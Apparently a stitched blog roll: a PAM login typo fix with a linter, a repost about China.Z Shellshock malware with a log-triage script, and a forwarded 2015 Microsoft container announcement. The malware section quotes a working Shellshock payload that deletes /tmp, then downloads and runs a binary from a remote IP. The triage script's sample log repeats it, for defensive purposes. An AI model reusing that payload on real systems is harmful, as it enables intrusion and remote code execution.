user local logon fail

I can access my Linux machine over SSH, but local logon fails with the error below in /var/log/security:

Jun 24 11:19:36 localhost login: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
Jun 24 11:19:36 localhost login: Permission denied

The root cause is an error in /etc/pam.d/login:

[root@VM42 ~]# more /etc/pam.d/login
#%PAM-1.0
auth [user_unknown=ignore success=ok ignore=ignore default=bad] pam_securetty.so
auth       include      system-auth
account    required     pam_nologin.so
account    include      system-auth
password   include      system-auth
# pam_selinux.so close should be the first session rule
session    required     pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_console.so
# pam_selinux.so open should only be followed by sessions to be executed in the user context
session    required     pam_selinux.so open
session    required     pam_namespace.so
session    optional     pam_keyinit.so force revoke
session    include      system-auth
-session   optional     pam_ck_connector.so
# add for oracle install
session    reqiured     pam_limits.so

The spelling of reqiured is not correct. Correct it to required and everything goes right.
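A check that catches this kind of typo before it locks out console logins, as an added example that is not part of the original post: a minimal linter that validates the type and control fields of PAM rule lines. The keyword lists follow the Linux-PAM configuration syntax; `lint_pam` and `SAMPLE` are names made up here, and the sample is an excerpt of the file shown above.

```python
import difflib

# Control keywords Linux-PAM accepts as the second field of a rule.
CONTROLS = ["required", "requisite", "sufficient", "optional", "include", "substack"]
TYPES = {"auth", "account", "password", "session"}
# Actions allowed in the [value=action ...] form; a number (jump) is also valid.
ACTIONS = {"ignore", "bad", "die", "ok", "done", "reset"}

def lint_pam(text):
    """Return (line_number, message) for each rule with a bad type or control."""
    problems = []
    for num, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments, including #%PAM-1.0
        if not line:
            continue
        fields = line.split(None, 1)
        if len(fields) < 2:
            problems.append((num, "incomplete rule"))
            continue
        mtype, rest = fields
        mtype = mtype[1:] if mtype.startswith("-") else mtype  # '-': module may be absent
        if mtype not in TYPES:
            problems.append((num, f"unknown type {mtype!r}"))
        if rest.startswith("["):
            body, closed, _ = rest[1:].partition("]")
            if not closed:
                problems.append((num, "unterminated [...] control"))
                continue
            for pair in body.split():
                _, eq, action = pair.partition("=")
                if not eq or not (action in ACTIONS or action.isdigit()):
                    problems.append((num, f"bad control entry {pair!r}"))
        else:
            control = rest.split()[0]
            if control not in CONTROLS:
                hint = difflib.get_close_matches(control, CONTROLS, n=1)
                msg = (f"unknown control {control!r}"
                       + (f", did you mean {hint[0]!r}?" if hint else ""))
                problems.append((num, msg))
    return problems

# Excerpt of the /etc/pam.d/login shown above, typo included.
SAMPLE = """\
#%PAM-1.0
auth [user_unknown=ignore success=ok ignore=ignore default=bad] pam_securetty.so
-session   optional     pam_ck_connector.so
session    reqiured     pam_limits.so
"""
```

Running `lint_pam` over every file in /etc/pam.d after an edit, while a root shell is still open, gives a chance to fix the rule before the next login attempt.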

-EOF-

China.z Malware info

My prod server had a security issue; the page below describes the same case:

From: http://users.jyu.fi/~sapekiis/china-z/index.html

China.Z Malware

Among the daily attacks on my web server, I got a request for the following file (without the line breaks).

() { :; }; /bin/bash -c "
rm -rf /tmp/*;
echo wget http://121.207.230.74:911/24 -O /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo echo By China.Z >> /tmp/Run.sh;
echo chmod 777 /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;
/tmp/Run.sh
"

It was clearly an attempt to exploit CVE-2014-6271 and friends, colloquially known as Shellshock or Bashdoor. That is not particularly interesting, because the bug was fixed a long time ago and my server does not even support CGI. However some searching revealed that the payload does not seem to be known.

I set up a trap and captured the payload the next time it came by. On a cursory glance it looked like a poorly-written C++ program that was compiled with a 2003 version of GCC on a RHEL machine.

I do not care to dig much deeper, so I am sharing the payload with the world in case someone does. I put the payload and the accompanying request into an archive. Note that the payload is most definitely harmful and you need to be really careful if you decide to work with it. I removed its execute bits as a precaution, but the rest is on you.

Also, you can follow these pages as a workaround guide:

1. http://www.slideshare.net/hendrikvb/chinaz-analysis-of-a-hack

2. http://blog.malwaremustdie.org/2015/01/mmd-0030-2015-new-elf-malware-on.html

3. http://blog.malwaremustdie.org/2015/06/the-elf-chinaz-reloaded.html
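Detection logic for requests like the one quoted above, as an added example that is not from the original page: it scans web access-log lines for the bash function-definition prefix and pulls out the download URL and the /tmp paths for triage. The log lines are constructed (combined log format, documentation-range client addresses, payload placed in the User-Agent field as an assumption); only the payload fragment is taken from the request shown above.

```python
import re

# "() {" is the bash function-definition prefix Shellshock payloads begin with.
FUNC_DEF = re.compile(r"\(\)\s*\{")
URL = re.compile(r"https?://[^\s;\"'\\]+")
TMP_PATH = re.compile(r"/tmp/[\w.\-]+")

def triage(log_lines):
    """Return one record per log line that carries a function-definition payload."""
    hits = []
    for line in log_lines:
        match = FUNC_DEF.search(line)
        if not match:
            continue
        payload = line[match.start():]
        hits.append({
            "client": line.split()[0],                          # first field: client address
            "urls": sorted(set(URL.findall(payload))),          # download sources to block
            "dropped": sorted(set(TMP_PATH.findall(payload))),  # files to look for on disk
        })
    return hits

# Constructed access-log lines; the second carries a fragment of the quoted request.
SAMPLE_LOG = [
    '198.51.100.23 - - [24/Jun/2015:11:02:10 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'203.0.113.7 - - [24/Jun/2015:11:05:41 +0000] "GET / HTTP/1.0" 200 512 "-" '
    r'"() { :; }; /bin/bash -c \"rm -rf /tmp/*; echo wget http://121.207.230.74:911/24 '
    r'-O /tmp/China.Z-rpvd >> /tmp/Run.sh; chmod 777 /tmp/Run.sh; /tmp/Run.sh\""',
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit)
```

A hit records an attempt, not a compromise; the `dropped` paths and outbound connections to the `urls` hosts are what to check on the server itself.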

–EOF–

 

Something interesting is happening…

The world’s largest taxi company owns no vehicles; the world’s most popular media owner creates no content; the most valuable retailer has no inventory; the world’s largest accommodation provider owns no real estate.

the revolution is involving..

FW: Microsoft Announces New Container Technologies for the Next Generation Cloud

Source: http://blogs.technet.com/b/server-cloud/archive/2015/04/08/microsoft-announces-new-container-technologies-for-the-next-generation-cloud.aspx

Guest post by Mike Neil, General Manager for Windows Server, Microsoft

In today’s cloud-first world, businesses increasingly rely on applications to fuel innovation and productivity. As the cloud evolves, containers are emerging as an attractive way for developers to quickly and efficiently build and deploy these applications at the speed of business. Offering developers and IT professionals the ability to deploy applications from a workstation to a server in mere seconds, containers are taking application development to a whole new level.

As developers look to expand the benefits of containers to a broader set of applications, new requirements are emerging. For example, heightened levels of trust may be required for enterprise systems or in hosted environments. Furthermore, developers often deploy into mixed operational environments where they may not have control of the platform where the application is deployed. Virtualization has historically provided a valuable level of isolation that enables these scenarios but there is now opportunity to blend the efficiency and density of the container model with the right level of isolation.

Last October, Microsoft and Docker, Inc. jointly announced plans to bring containers to developers across the Docker and Windows ecosystems via Windows Server Containers, available in the next version of Windows Server. We will be unveiling the first live demonstration in a few weeks, starting at the BUILD conference. Today, we are taking containerization one step further by expanding the scenarios and workloads developers can address with containers:

• Hyper-V Containers, a new container deployment option with enhanced isolation powered by Hyper-V virtualization 
• Nano Server, a minimal footprint installation of Windows Server that is highly optimized for the cloud, and ideal for containers.

First-of-Their-Kind Hyper-V Containers

Leveraging our deep virtualization experience, Microsoft will now offer containers with a new level of isolation previously reserved only for fully dedicated physical or virtual machines, while maintaining an agile and efficient experience with full Docker cross-platform integration. Through this new first-of-its-kind offering, Hyper-V Containers will ensure code running in one container remains isolated and cannot impact the host operating system or other containers running on the same host.

While Hyper-V containers offer an additional deployment option between Windows Server Containers and the Hyper-V virtual machine, you will be able to deploy them using the same development, programming and management tools you would use for Windows Server Containers. In addition, applications developed for Windows Server Containers can be deployed as a Hyper-V Container without modification, providing greater flexibility for operators who need to choose degrees of density, agility, and isolation in a multi-platform, multi-application environment.

Our Containers in the Docker Ecosystem

Docker plays an important part in enabling the container ecosystem across Linux, Windows Server and the forthcoming Hyper-V Containers. We have been working closely with the Docker community to leverage and extend container innovations in Windows Server and Microsoft Azure, including submitting the development of the Docker engine for Windows Server Containers as an open contribution to the Docker repository on GitHub. In addition, we’ve made it easier to deploy the latest Docker engine using Azure extensions to set up a Docker host on Azure Linux VMs and to deploy a Docker-managed VM directly from the Azure Marketplace. Finally, we’ve added integration for Swarm, Machine and Compose into Azure and Hyper-V.

“Microsoft has been a great partner and contributor to the Docker project since our joint announcement in October of 2014,” said Nick Stinemates, Head of Business Development and Technical Alliances. “They have made a number of enhancements to improve the developer experience for Docker on Azure, while making contributions to all aspects of the Docker platform including Docker orchestration tools and Docker Client on Windows. Microsoft has also demonstrated its leadership within the community by providing compelling new content like dockerized .NET for Linux. At the same time, they’ve been working to extend the benefits of Docker containers – application portability to any infrastructure and an accelerated development process – to its Windows developer community.”

Introducing Nano Server: The Nucleus of Modern Apps and Cloud

The operating system has evolved dramatically with the move to the cloud. Many customers today need their OS for the primary purpose of powering born-in-the-cloud applications. Leveraging our years of experience building and running hyper-scale datacenters, Microsoft is uniquely positioned to provide a purpose-built OS to power modern apps and containers.

The result is Nano Server, a minimal footprint installation option of Windows Server that is highly optimized for the cloud, including containers. Nano Server provides just the components you need – nothing else, meaning smaller server images, which reduces deployment times, decreases network bandwidth consumption, and improves uptime and security. This small footprint makes Nano Server an ideal complement for Windows Server Containers and Hyper-V Containers, as well as other cloud-optimized scenarios. A preview will be available in the coming weeks, and you can read more about the technology on the Windows Server blog.

Containers are bringing speed and scale to the next level in today’s cloud-first world. Microsoft is uniquely positioned to propel more organizations forward into the next era of containerization, by offering flexibility and choice through Windows Server containers, Linux containers, and Hyper-V containers both in the cloud and on-premises. Today’s announcements are just the beginning of what’s to come, as we continue to fuel both the growth of containers in the industry, and new levels of application innovation for all developers.

Stay tuned for more details on these new innovations, beginning at our BUILD conference in a few weeks.